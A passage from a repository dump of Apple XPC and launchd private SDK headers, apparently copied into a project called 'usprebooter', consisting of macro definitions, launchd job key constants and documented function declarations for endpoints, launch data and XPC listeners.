XPC_USED #define XPC_TRANSPARENT_UNION __attribute__((transparent_union)) #if __clang__ #define XPC_DEPRECATED(m) __attribute__((deprecated(m))) #else // __clang__ #define XPC_DEPRECATED(m) __attribute__((deprecated)) #endif // __clang #ifndef XPC_TESTEXPORT #define XPC_TESTEXPORT XPC_NOEXPORT #endif // XPC_TESTEXPORT #if defined(__XPC_TEST__) && __XPC_TEST__ #define XPC_TESTSTATIC #define XPC_TESTEXTERN extern #else // defined(__XPC_TEST__) && __XPC_TEST__ #define XPC_TESTSTATIC static #endif // defined(__XPC_TEST__) && __XPC_TEST__ #if __has_feature(objc_arc) #define XPC_GIVES_REFERENCE __strong #define XPC_UNRETAINED __unsafe_unretained #define XPC_BRIDGE(xo) ((__bridge void *)(xo)) #define XPC_BRIDGEREF_BEGIN(xo) ((__bridge_retained void *)(xo)) #define XPC_BRIDGEREF_BEGIN_WITH_REF(xo) ((__bridge void *)(xo)) #define XPC_BRIDGEREF_MIDDLE(xo) ((__bridge id)(xo)) #define XPC_BRIDGEREF_END(xo) ((__bridge_transfer id)(xo)) #else // __has_feature(objc_arc) #define XPC_GIVES_REFERENCE #define XPC_UNRETAINED #define XPC_BRIDGE(xo) (xo) #define XPC_BRIDGEREF_BEGIN(xo) (xo) #define XPC_BRIDGEREF_BEGIN_WITH_REF(xo) (xo) #define XPC_BRIDGEREF_MIDDLE(xo) (xo) #define XPC_BRIDGEREF_END(xo) (xo) #endif // __has_feature(objc_arc) #define _xpc_unreachable() __builtin_unreachable() #else // __GNUC__ /*! @parseOnly */ #define XPC_CONSTRUCTOR /*! @parseOnly */ #define XPC_NORETURN /*! @parseOnly */ #define XPC_NOTHROW /*! @parseOnly */ #define XPC_NONNULL1 /*! @parseOnly */ #define XPC_NONNULL2 /*! @parseOnly */ #define XPC_NONNULL3 /*! @parseOnly */ #define XPC_NONNULL4 /*! @parseOnly */ #define XPC_NONNULL5 /*! @parseOnly */ #define XPC_NONNULL6 /*! @parseOnly */ #define XPC_NONNULL7 /*! @parseOnly */ #define XPC_NONNULL8 /*! @parseOnly */ #define XPC_NONNULL9 /*! @parseOnly */ #define XPC_NONNULL10 /*! @parseOnly */ #define XPC_NONNULL11 /*! @parseOnly */ #define XPC_NONNULL(n) /*! @parseOnly */ #define XPC_NONNULL_ALL /*! @parseOnly */ #define XPC_SENTINEL /*! @parseOnly */ #define XPC_PURE /*! @parseOnly */ #define XPC_WARN_RESULT /*! @parseOnly */ #define XPC_MALLOC /*! @parseOnly */ #define XPC_UNUSED /*! @parseOnly */ #define XPC_PACKED /*! @parseOnly */ #define XPC_PRINTF(m, n) /*! @parseOnly */ #define XPC_INLINE static inline /*! @parseOnly */ #define XPC_NOINLINE /*! @parseOnly */ #define XPC_NOIMPL /*! @parseOnly */ #define XPC_EXPORT extern /*! @parseOnly */ #define XPC_WEAKIMPORT /*! @parseOnly */ #define XPC_DEPRECATED /*! @parseOnly */ #define XPC_UNAVAILABLE(m) /*! @parseOnly */ #define XPC_NOESCAPE #endif // __GNUC__ #if __has_feature(assume_nonnull) #define XPC_ASSUME_NONNULL_BEGIN _Pragma("clang assume_nonnull begin") #define XPC_ASSUME_NONNULL_END _Pragma("clang assume_nonnull end") #else #define XPC_ASSUME_NONNULL_BEGIN #define XPC_ASSUME_NONNULL_END #endif #if __has_feature(nullability_on_arrays) #define XPC_NONNULL_ARRAY _Nonnull #else #define XPC_NONNULL_ARRAY #endif #if defined(__has_ptrcheck) && __has_ptrcheck #define XPC_PTR_ASSUMES_SINGLE __ptrcheck_abi_assume_single() #define XPC_SINGLE __single #define XPC_UNSAFE_INDEXABLE __unsafe_indexable #define XPC_CSTRING XPC_UNSAFE_INDEXABLE #define XPC_SIZEDBY(N) __sized_by(N) #define XPC_COUNTEDBY(N) __counted_by(N) #define XPC_UNSAFE_FORGE_SIZED_BY(_type, _ptr, _size) \ __unsafe_forge_bidi_indexable(_type, _ptr, _size) #define XPC_UNSAFE_FORGE_SINGLE(_type, _ptr) \ __unsafe_forge_single(_type, _ptr) #else // defined(__has_ptrcheck) ** __has_ptrcheck #define XPC_PTR_ASSUMES_SINGLE #define XPC_SINGLE #define XPC_UNSAFE_INDEXABLE #define XPC_CSTRING #define XPC_SIZEDBY(N) #define XPC_COUNTEDBY(N) #define XPC_UNSAFE_FORGE_SIZED_BY(_type, _ptr, _size) ((_type)(_ptr)) #define XPC_UNSAFE_FORGE_SINGLE(_type, _ptr) ((_type)(_ptr)) #endif // defined(__has_ptrcheck) ** __has_ptrcheck #ifdef OS_CLOSED_OPTIONS #define XPC_FLAGS_ENUM(_name, _type, ...) \ OS_CLOSED_OPTIONS(_name, _type, __VA_ARGS__) #else // OS_CLOSED_ENUM #define XPC_FLAGS_ENUM(_name, _type, ...) \ OS_ENUM(_name, _type, __VA_ARGS__) #endif // OS_CLOSED_ENUM #ifdef OS_CLOSED_ENUM #define XPC_ENUM(_name, _type, ...) \ OS_CLOSED_ENUM(_name, _type, __VA_ARGS__) #else // OS_CLOSED_ENUM #define XPC_ENUM(_name, _type, ...) \ OS_ENUM(_name, _type, __VA_ARGS__) #endif // OS_CLOSED_ENUM #if __has_attribute(swift_name) # define XPC_SWIFT_NAME(_name) __attribute__((swift_name(_name))) #else # define XPC_SWIFT_NAME(_name) // __has_attribute(swift_name) #endif #define XPC_SWIFT_UNAVAILABLE(msg) __swift_unavailable(msg) #define XPC_SWIFT_NOEXPORT XPC_SWIFT_UNAVAILABLE("Unavailable in Swift from the XPC C Module") __END_DECLS #endif // __XPC_BASE_H__ ================================================ FILE: usprebooter/Private Headers I stole from the macOS SDK/xpc/debug.h ================================================ #ifndef __XPC_DEBUG_H__ #define __XPC_DEBUG_H__ __BEGIN_DECLS /*! * @function xpc_debugger_api_misuse_info * Returns a pointer to a string describing the reason XPC aborted the calling * process. On OS X, this will be the same string present in the "Application * Specific Information" section of the crash report. * * @result * A pointer to the human-readable string describing the reason the caller was * aborted. If XPC was not responsible for the program's termination, NULL will * be returned. * * @discussion * This function is only callable from within a debugger. It is not meant to be * called by the program directly. */ XPC_DEBUGGER_EXCL const char * xpc_debugger_api_misuse_info(void); __END_DECLS #endif // __XPC_DEBUG_H__ ================================================ FILE: usprebooter/Private Headers I stole from the macOS SDK/xpc/endpoint.h ================================================ #ifndef __XPC_ENDPOINT_H__ #define __XPC_ENDPOINT_H__ __BEGIN_DECLS /*! * @function xpc_endpoint_create * Creates a new endpoint from a connection that is suitable for embedding into * messages. * * @param connection * Only connections obtained through calls to xpc_connection_create*() may be * given to this API. Passing any other type of connection is not supported and * will result in undefined behavior. * * @result * A new endpoint object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 xpc_endpoint_t _Nonnull xpc_endpoint_create(xpc_connection_t _Nonnull connection); __END_DECLS #endif // __XPC_ENDPOINT_H__ ================================================ FILE: usprebooter/Private Headers I stole from the macOS SDK/xpc/launch.h ================================================ #ifndef __XPC_LAUNCH_H__ #define __XPC_LAUNCH_H__ /*! * @header * These interfaces were only ever documented for the purpose of allowing a * launchd job to obtain file descriptors associated with the sockets it * advertised in its launchd.plist(5). That functionality is now available in a * much more straightforward fashion through the {@link launch_activate_socket} * API. * * There are currently no replacements for other uses of the {@link launch_msg} * API, including submitting, removing, starting, stopping and listing jobs. */ #include #include #include #include #include #include #if __has_feature(assume_nonnull) _Pragma("clang assume_nonnull begin") #endif __BEGIN_DECLS #define LAUNCH_KEY_SUBMITJOB "SubmitJob" #define LAUNCH_KEY_REMOVEJOB "RemoveJob" #define LAUNCH_KEY_STARTJOB "StartJob" #define LAUNCH_KEY_STOPJOB "StopJob" #define LAUNCH_KEY_GETJOB "GetJob" #define LAUNCH_KEY_GETJOBS "GetJobs" #define LAUNCH_KEY_CHECKIN "CheckIn" #define LAUNCH_JOBKEY_LABEL "Label" #define LAUNCH_JOBKEY_DISABLED "Disabled" #define LAUNCH_JOBKEY_USERNAME "UserName" #define LAUNCH_JOBKEY_GROUPNAME "GroupName" #define LAUNCH_JOBKEY_TIMEOUT "TimeOut" #define LAUNCH_JOBKEY_EXITTIMEOUT "ExitTimeOut" #define LAUNCH_JOBKEY_INITGROUPS "InitGroups" #define LAUNCH_JOBKEY_SOCKETS "Sockets" #define LAUNCH_JOBKEY_MACHSERVICES "MachServices" #define LAUNCH_JOBKEY_MACHSERVICELOOKUPPOLICIES "MachServiceLookupPolicies" #define LAUNCH_JOBKEY_INETDCOMPATIBILITY "inetdCompatibility" #define LAUNCH_JOBKEY_ENABLEGLOBBING "EnableGlobbing" #define LAUNCH_JOBKEY_PROGRAMARGUMENTS "ProgramArguments" #define LAUNCH_JOBKEY_PROGRAM "Program" #define LAUNCH_JOBKEY_ONDEMAND "OnDemand" #define LAUNCH_JOBKEY_KEEPALIVE "KeepAlive" #define LAUNCH_JOBKEY_LIMITLOADTOHOSTS "LimitLoadToHosts" #define LAUNCH_JOBKEY_LIMITLOADFROMHOSTS "LimitLoadFromHosts" #define LAUNCH_JOBKEY_LIMITLOADTOSESSIONTYPE "LimitLoadToSessionType" #define LAUNCH_JOBKEY_LIMITLOADTOHARDWARE "LimitLoadToHardware" #define LAUNCH_JOBKEY_LIMITLOADFROMHARDWARE "LimitLoadFromHardware" #define LAUNCH_JOBKEY_RUNATLOAD "RunAtLoad" #define LAUNCH_JOBKEY_ROOTDIRECTORY "RootDirectory" #define LAUNCH_JOBKEY_WORKINGDIRECTORY "WorkingDirectory" #define LAUNCH_JOBKEY_ENVIRONMENTVARIABLES "EnvironmentVariables" #define LAUNCH_JOBKEY_USERENVIRONMENTVARIABLES "UserEnvironmentVariables" #define LAUNCH_JOBKEY_UMASK "Umask" #define LAUNCH_JOBKEY_NICE "Nice" #define LAUNCH_JOBKEY_HOPEFULLYEXITSFIRST "HopefullyExitsFirst" #define LAUNCH_JOBKEY_HOPEFULLYEXITSLAST "HopefullyExitsLast" #define LAUNCH_JOBKEY_LOWPRIORITYIO "LowPriorityIO" #define LAUNCH_JOBKEY_LOWPRIORITYBACKGROUNDIO "LowPriorityBackgroundIO" #define LAUNCH_JOBKEY_MATERIALIZEDATALESSFILES "MaterializeDatalessFiles" #define LAUNCH_JOBKEY_SESSIONCREATE "SessionCreate" #define LAUNCH_JOBKEY_STARTONMOUNT "StartOnMount" #define LAUNCH_JOBKEY_SOFTRESOURCELIMITS "SoftResourceLimits" #define LAUNCH_JOBKEY_HARDRESOURCELIMITS "HardResourceLimits" #define LAUNCH_JOBKEY_STANDARDINPATH "StandardInPath" #define LAUNCH_JOBKEY_STANDARDOUTPATH "StandardOutPath" #define LAUNCH_JOBKEY_STANDARDERRORPATH "StandardErrorPath" #define LAUNCH_JOBKEY_DEBUG "Debug" #define LAUNCH_JOBKEY_WAITFORDEBUGGER "WaitForDebugger" #define LAUNCH_JOBKEY_QUEUEDIRECTORIES "QueueDirectories" #define LAUNCH_JOBKEY_WATCHPATHS "WatchPaths" #define LAUNCH_JOBKEY_STARTINTERVAL "StartInterval" #define LAUNCH_JOBKEY_STARTCALENDARINTERVAL "StartCalendarInterval" #define LAUNCH_JOBKEY_BONJOURFDS "BonjourFDs" #define LAUNCH_JOBKEY_LASTEXITSTATUS "LastExitStatus" #define LAUNCH_JOBKEY_PID "PID" #define LAUNCH_JOBKEY_THROTTLEINTERVAL "ThrottleInterval" #define LAUNCH_JOBKEY_LAUNCHONLYONCE "LaunchOnlyOnce" #define LAUNCH_JOBKEY_ABANDONPROCESSGROUP "AbandonProcessGroup" #define LAUNCH_JOBKEY_IGNOREPROCESSGROUPATSHUTDOWN \ "IgnoreProcessGroupAtShutdown" #define LAUNCH_JOBKEY_LEGACYTIMERS "LegacyTimers" #define LAUNCH_JOBKEY_ENABLEPRESSUREDEXIT "EnablePressuredExit" #define LAUNCH_JOBKEY_ENABLETRANSACTIONS "EnableTransactions" #define LAUNCH_JOBKEY_DRAINMESSAGESONFAILEDINIT "DrainMessagesOnFailedInit" #define LAUNCH_JOBKEY_POLICIES "Policies" #define LAUNCH_JOBKEY_BUNDLEPROGRAM "BundleProgram" #define LAUNCH_JOBKEY_ASSOCIATEDBUNDLEIDENTIFIERS "AssociatedBundleIdentifiers" #define LAUNCH_JOBKEY_SPAWNCONSTRAINT "SpawnConstraint" #define LAUNCH_JOBKEY_PUBLISHESEVENTS "PublishesEvents" #define LAUNCH_KEY_PUBLISHESEVENTS_DOMAININTERNAL "DomainInternal" #define LAUNCH_JOBPOLICY_DENYCREATINGOTHERJOBS "DenyCreatingOtherJobs" #define LAUNCH_JOBINETDCOMPATIBILITY_WAIT "Wait" #define LAUNCH_JOBINETDCOMPATIBILITY_INSTANCES "Instances" #define LAUNCH_JOBKEY_MACH_RESETATCLOSE "ResetAtClose" #define LAUNCH_JOBKEY_MACH_HIDEUNTILCHECKIN "HideUntilCheckIn" #define LAUNCH_JOBKEY_KEEPALIVE_SUCCESSFULEXIT "SuccessfulExit" #define LAUNCH_JOBKEY_KEEPALIVE_NETWORKSTATE "NetworkState" #define LAUNCH_JOBKEY_KEEPALIVE_PATHSTATE "PathState" #define LAUNCH_JOBKEY_KEEPALIVE_OTHERJOBACTIVE "OtherJobActive" #define LAUNCH_JOBKEY_KEEPALIVE_OTHERJOBENABLED "OtherJobEnabled" #define LAUNCH_JOBKEY_KEEPALIVE_AFTERINITIALDEMAND "AfterInitialDemand" #define LAUNCH_JOBKEY_KEEPALIVE_CRASHED "Crashed" #define LAUNCH_JOBKEY_LAUNCHEVENTS "LaunchEvents" #define LAUNCH_JOBKEY_CAL_MINUTE "Minute" #define LAUNCH_JOBKEY_CAL_HOUR "Hour" #define LAUNCH_JOBKEY_CAL_DAY "Day" #define LAUNCH_JOBKEY_CAL_WEEKDAY "Weekday" #define LAUNCH_JOBKEY_CAL_MONTH "Month" #define LAUNCH_JOBKEY_RESOURCELIMIT_CORE "Core" #define LAUNCH_JOBKEY_RESOURCELIMIT_CPU "CPU" #define LAUNCH_JOBKEY_RESOURCELIMIT_DATA "Data" #define LAUNCH_JOBKEY_RESOURCELIMIT_FSIZE "FileSize" #define LAUNCH_JOBKEY_RESOURCELIMIT_MEMLOCK "MemoryLock" #define LAUNCH_JOBKEY_RESOURCELIMIT_NOFILE "NumberOfFiles" #define LAUNCH_JOBKEY_RESOURCELIMIT_NPROC "NumberOfProcesses" #define LAUNCH_JOBKEY_RESOURCELIMIT_RSS "ResidentSetSize" #define LAUNCH_JOBKEY_RESOURCELIMIT_STACK "Stack" #define LAUNCH_JOBKEY_DISABLED_MACHINETYPE "MachineType" #define LAUNCH_JOBKEY_DISABLED_MODELNAME "ModelName" #define LAUNCH_JOBKEY_DATASTORES "Datastores" #define LAUNCH_JOBKEY_DATASTORES_SIZELIMIT "SizeLimit" #define LAUNCH_JOBSOCKETKEY_TYPE "SockType" #define LAUNCH_JOBSOCKETKEY_PASSIVE "SockPassive" #define LAUNCH_JOBSOCKETKEY_BONJOUR "Bonjour" #define LAUNCH_JOBSOCKETKEY_SECUREWITHKEY "SecureSocketWithKey" #define LAUNCH_JOBSOCKETKEY_PATHNAME "SockPathName" #define LAUNCH_JOBSOCKETKEY_PATHMODE "SockPathMode" #define LAUNCH_JOBSOCKETKEY_PATHOWNER "SockPathOwner" #define LAUNCH_JOBSOCKETKEY_PATHGROUP "SockPathGroup" #define LAUNCH_JOBSOCKETKEY_NODENAME "SockNodeName" #define LAUNCH_JOBSOCKETKEY_SERVICENAME "SockServiceName" #define LAUNCH_JOBSOCKETKEY_FAMILY "SockFamily" #define LAUNCH_JOBSOCKETKEY_PROTOCOL "SockProtocol" #define LAUNCH_JOBSOCKETKEY_MULTICASTGROUP "MulticastGroup" #define LAUNCH_JOBKEY_PROCESSTYPE "ProcessType" #define LAUNCH_KEY_PROCESSTYPE_APP "App" #define LAUNCH_KEY_PROCESSTYPE_STANDARD "Standard" #define LAUNCH_KEY_PROCESSTYPE_BACKGROUND "Background" #define LAUNCH_KEY_PROCESSTYPE_INTERACTIVE "Interactive" #define LAUNCH_KEY_PROCESSTYPE_ADAPTIVE "Adaptive" /*! * @function launch_activate_socket * * @abstract * Retrieves the file descriptors for sockets specified in the process' * launchd.plist(5). * * @param name * The name of the socket entry in the service's Sockets dictionary. * * @param fds * On return, this parameter will be populated with an array of file * descriptors. One socket can have many descriptors associated with it * depending on the characteristics of the network interfaces on the system. * The descriptors in this array are the results of calling getaddrinfo(3) with * the parameters described in launchd.plist(5). * * The caller is responsible for calling free(3) on the returned pointer. * * @param cnt * The number of file descriptor entries in the returned array. * * @result * On success, zero is returned. Otherwise, an appropriate POSIX-domain is * returned. Possible error codes are: * * ENOENT -> There was no socket of the specified name owned by the caller. * ESRCH -> The caller is not a process managed by launchd. * EALREADY -> The socket has already been activated by the caller. */ __OSX_AVAILABLE_STARTING(__MAC_10_10, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 OS_NONNULL2 OS_NONNULL3 int launch_activate_socket(const char *name, int * _Nonnull * _Nullable fds, size_t *cnt); typedef struct _launch_data *launch_data_t; typedef void (*launch_data_dict_iterator_t)(const launch_data_t lval, const char *key, void * _Nullable ctx); typedef enum { LAUNCH_DATA_DICTIONARY = 1, LAUNCH_DATA_ARRAY, LAUNCH_DATA_FD, LAUNCH_DATA_INTEGER, LAUNCH_DATA_REAL, LAUNCH_DATA_BOOL, LAUNCH_DATA_STRING, LAUNCH_DATA_OPAQUE, LAUNCH_DATA_ERRNO, LAUNCH_DATA_MACHPORT, } launch_data_type_t; __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_MALLOC OS_WARN_RESULT launch_data_t launch_data_alloc(launch_data_type_t type); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_MALLOC OS_WARN_RESULT OS_NONNULL1 launch_data_t launch_data_copy(launch_data_t ld); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 launch_data_type_t launch_data_get_type(const launch_data_t ld); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_NONNULL1 void launch_data_free(launch_data_t ld); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_NONNULL1 OS_NONNULL2 OS_NONNULL3 bool launch_data_dict_insert(launch_data_t ldict, const launch_data_t lval, const char *key); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 OS_NONNULL2 launch_data_t _Nullable launch_data_dict_lookup(const launch_data_t ldict, const char *key); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_NONNULL1 OS_NONNULL2 bool launch_data_dict_remove(launch_data_t ldict, const char *key); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_NONNULL1 OS_NONNULL2 void launch_data_dict_iterate(const launch_data_t ldict, launch_data_dict_iterator_t iterator, void * _Nullable ctx); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 size_t launch_data_dict_get_count(const launch_data_t ldict); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_NONNULL1 OS_NONNULL2 bool launch_data_array_set_index(launch_data_t larray, const launch_data_t lval, size_t idx); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 launch_data_t launch_data_array_get_index(const launch_data_t larray, size_t idx); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 size_t launch_data_array_get_count(const launch_data_t larray); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_MALLOC OS_WARN_RESULT launch_data_t launch_data_new_fd(int fd); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_MALLOC OS_WARN_RESULT launch_data_t launch_data_new_machport(mach_port_t val); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_MALLOC OS_WARN_RESULT launch_data_t launch_data_new_integer(long long val); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_MALLOC OS_WARN_RESULT launch_data_t launch_data_new_bool(bool val); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_MALLOC OS_WARN_RESULT launch_data_t launch_data_new_real(double val); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_MALLOC OS_WARN_RESULT launch_data_t launch_data_new_string(const char *val); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_MALLOC OS_WARN_RESULT launch_data_t launch_data_new_opaque(const void *bytes, size_t sz); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_NONNULL1 bool launch_data_set_fd(launch_data_t ld, int fd); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_NONNULL1 bool launch_data_set_machport(launch_data_t ld, mach_port_t mp); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_NONNULL1 bool launch_data_set_integer(launch_data_t ld, long long val); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_NONNULL1 bool launch_data_set_bool(launch_data_t ld, bool val); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_NONNULL1 bool launch_data_set_real(launch_data_t ld, double val); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_NONNULL1 bool launch_data_set_string(launch_data_t ld, const char *val); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_NONNULL1 bool launch_data_set_opaque(launch_data_t ld, const void *bytes, size_t sz); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 int launch_data_get_fd(const launch_data_t ld); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 mach_port_t launch_data_get_machport(const launch_data_t ld); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 long long launch_data_get_integer(const launch_data_t ld); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 bool launch_data_get_bool(const launch_data_t ld); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 double launch_data_get_real(const launch_data_t ld); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 const char * launch_data_get_string(const launch_data_t ld); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 void * _Nullable launch_data_get_opaque(const launch_data_t ld); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 size_t launch_data_get_opaque_size(const launch_data_t ld); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT OS_NONNULL1 int launch_data_get_errno(const launch_data_t ld); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_WARN_RESULT int launch_get_fd(void); __OSX_AVAILABLE_BUT_DEPRECATED(__MAC_10_4, __MAC_10_10, __IPHONE_2_0, __IPHONE_8_0) OS_EXPORT OS_MALLOC OS_WARN_RESULT OS_NONNULL1 launch_data_t launch_msg(const launch_data_t request); __END_DECLS #if __has_feature(assume_nonnull) _Pragma("clang assume_nonnull end") #endif #endif // __XPC_LAUNCH_H__ ================================================ FILE: usprebooter/Private Headers I stole from the macOS SDK/xpc/listener.h ================================================ #ifndef __XPC_LISTENER_H__ #define __XPC_LISTENER_H__ #ifndef __XPC_INDIRECT__ #error "Please #include instead of this file directly." // For HeaderDoc. #include "base.h" #endif // __XPC_INDIRECT__ #ifndef __BLOCKS__ #error "XPC Listener require Blocks support." #endif // __BLOCKS__ XPC_ASSUME_NONNULL_BEGIN __BEGIN_DECLS /*! * @typedef xpc_listener_t * * @discussion * Listeners represent the server side variant of an XPC Session. * * Listeners are activated and then begin receiving `xpc_session_t` from peers attempting to * connect to the server * */ OS_OBJECT_DECL_CLASS(xpc_listener); #pragma mark Constants /*! * @typedef xpc_listener_create_flags_t * Constants representing different options available when creating an XPC * Listener. * * @const XPC_LISTENER_CREATE_INACTIVE * Indicates that the listener should not be activated during its creation. The * returned listener must be manually activated using * {@link xpc_listener_activate} before it can be used. */ XPC_SWIFT_NOEXPORT XPC_FLAGS_ENUM(xpc_listener_create_flags, uint64_t, XPC_LISTENER_CREATE_NONE XPC_SWIFT_NAME("none") = 0, XPC_LISTENER_CREATE_INACTIVE XPC_SWIFT_NAME("inactive") = (1 << 0), ); #pragma mark Handlers typedef void (^xpc_listener_incoming_session_handler_t)(xpc_session_t peer); #pragma mark Helpers /*! * @function xpc_listener_copy_description * Copy the string description of the listener. * * @param listener * The listener to be examined. * * @result * The underlying C string description for the provided session. This string * should be disposed of with free(3) when done. This will return NULL if a * string description could not be generated. */ API_AVAILABLE(macos(14.0), ios(17.0), tvos(17.0), watchos(10.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT XPC_WARN_RESULT char * _Nullable xpc_listener_copy_description(xpc_listener_t listener); #pragma mark Server Session Creation /*! * @function xpc_listener_create * Creates a listener with the service defined by the provided name * * @param service * The Mach service or XPC Service name to create the listener with. * * @param target_queue * The GCD queue onto which listener events will be submitted. This may be a * concurrent queue. This parameter may be NULL, in which case the target queue * will be libdispatch's default target queue, defined as * DISPATCH_TARGET_QUEUE_DEFAULT. * * @param flags * Additional attributes to create the listener. * * @param incoming_session_handler * The handler block to be called when a peer is attempting to establish a * connection with this listener. The incoming session handler is mandatory. * * @param error_out * An out-parameter that, if set and in the event of an error, will point to an * {@link xpc_rich_error_t} describing the details of any errors that occurred. * * @result * On success this returns a new listener object. The returned listener is * activated by default and will begin receiving incoming session requests. * The caller is responsible for disposing of the returned object with * {@link xpc_release} when it is no longer needed. On failure this will return * NULL and if set, error_out will be set to an error describing the failure. * * @discussion * This will fail if the specified XPC service is either not found or is * unavailable. * * When the `incoming_session_handler` returns, the peer session will * be automatically activated unless the peer session was explicitly cancelled. * Before the `incoming_session_handler` returns it must set a message * handler on the peer session using `xpc_session_set_incoming_message_handler` * or cancel the session using `xpc_session_cancel`. Failure to take one of * these two actions will result in an API misuse crash. */ API_AVAILABLE(macos(14.0), ios(17.0), tvos(17.0), watchos(10.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_listener_t _Nullable xpc_listener_create(const char * service, dispatch_queue_t _Nullable target_queue, xpc_listener_create_flags_t flags, xpc_listener_incoming_session_handler_t incoming_session_handler, xpc_rich_error_t _Nullable * _Nullable error_out); #pragma mark Lifecycle /*! * @function xpc_listener_activate * Activates a listener. * * @param listener * The listener object to activate. * * @param error_out * An out-parameter that, if set and in the event of an error, 